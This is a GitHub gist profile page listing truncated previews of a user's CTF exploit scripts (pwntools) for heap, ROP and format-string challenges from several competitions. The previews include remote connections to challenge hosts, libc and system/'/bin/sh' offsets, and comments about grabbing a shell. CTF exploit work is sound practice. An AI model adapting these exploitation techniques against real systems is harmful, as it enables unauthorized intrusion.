Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / bbHeap_exploit.py
Last active May 5, 2018 12:05
BabyHeap Exploit - CTF
#!/usr/bin/python
from pwn import *
r = remote("pwnhost.local",7331)
#r = process("./babyheap")
def alloc(size):
r.sendline("1")
r.recvuntil("Size:")
@0xPwny
0xPwny / exploit.py
Created April 1, 2018 14:10
Hack in Casablanca - PWN 200
from pwn import *
#RUN IT AND [HOPE] IT WILL JUMP TO YOUR [ROP] :D
r = process("./ch2")
pause()
r.recvuntil("ID:")
@0xPwny
0xPwny / exploit.py
Last active March 31, 2018 19:13
HACK in CASABLANCA CTF - PWN 100
#!/usr/bin/python
from pwn import *
#Dirty script but respect it its a shell grabber ;)
r = remote("172.21.2.200",3333)
r.recvuntil(":")
leak = int(r.recvline().split(",")[0])
@0xPwny
0xPwny / exploit.py
Created March 31, 2018 13:50
HACK in CASABLANCA CTF - PWN 300
from pwn import *
_author_ = "ABDELJALIL NOUIRI"
r = remote("172.21.2.200",5555)
func_offset = 0x0000000000000B30
systemplt_offset = 0x000000000000960
binsh_offset = 0x0000000000001002
@0xPwny
0xPwny / envy.py
Last active February 26, 2018 00:08
Xiomara CTF 2018 - Reversing { 150 pts }
#!/usr/bin/pyhon
"""
.data:0000000000201020 off_201020 dq 100000078h ; DATA XREF: sub_8CA+71↑o
.data:0000000000201028 dq 200000069h
.data:0000000000201030 dq 30000006Fh
.data:0000000000201038 dq 40000006Dh
.data:0000000000201040 dq 500000061h
.data:0000000000201048 dq 600000072h
.data:0000000000201050 dq 700000061h
@0xPwny
0xPwny / babyexploit.py
Created November 19, 2017 12:16
hxp CTF 2017 - PWN - Babyish
from pwn import *
###LOCAL
#r = process("./vuln")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
###REMOTE
r =remote("35.198.98.140",45067)
libc = ELF("libc.so.6")
@0xPwny
0xPwny / filesec.py
Created October 11, 2017 19:57
CTF 2017 - PWN secret_file
#!/usr/bin/python
from pwn import *
#r = remote("192.168.4.88",9001)
r = process("./secretfile")
def pwn():
pld = "B" * 256
@0xPwny
0xPwny / baby.py
Created September 24, 2017 16:15
BackdoorCTF 2017 - PWN - BABY-0x41414141
from pwn import *
from libformatstr import *
file = ELF("./32_new")
flag = 0x0804870b
r = remote("163.172.176.29",9035)
r.recvuntil("name?")
@0xPwny
0xPwny / dont_do_it.py
Created September 24, 2017 16:12
backdoorCTF 2016 - PWN - JUST-DO-IT
from pwn import *
#r = process("./32_chal")
r = remote("163.172.176.29",9036)
file = ELF("./32_chal")
libc = ELF("libc.so.6")
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
@0xPwny
0xPwny / scv_exploit.py
Created September 18, 2017 14:32
Csaw 2017 CTF - Scv PWN
from pwn import *
import struct
#r = process("./scv")
r = remote("pwn.chal.csaw.io",3764)
libc = ELF("libc-2.23.so")
readgot = 0x0602030
puts =0x04008d0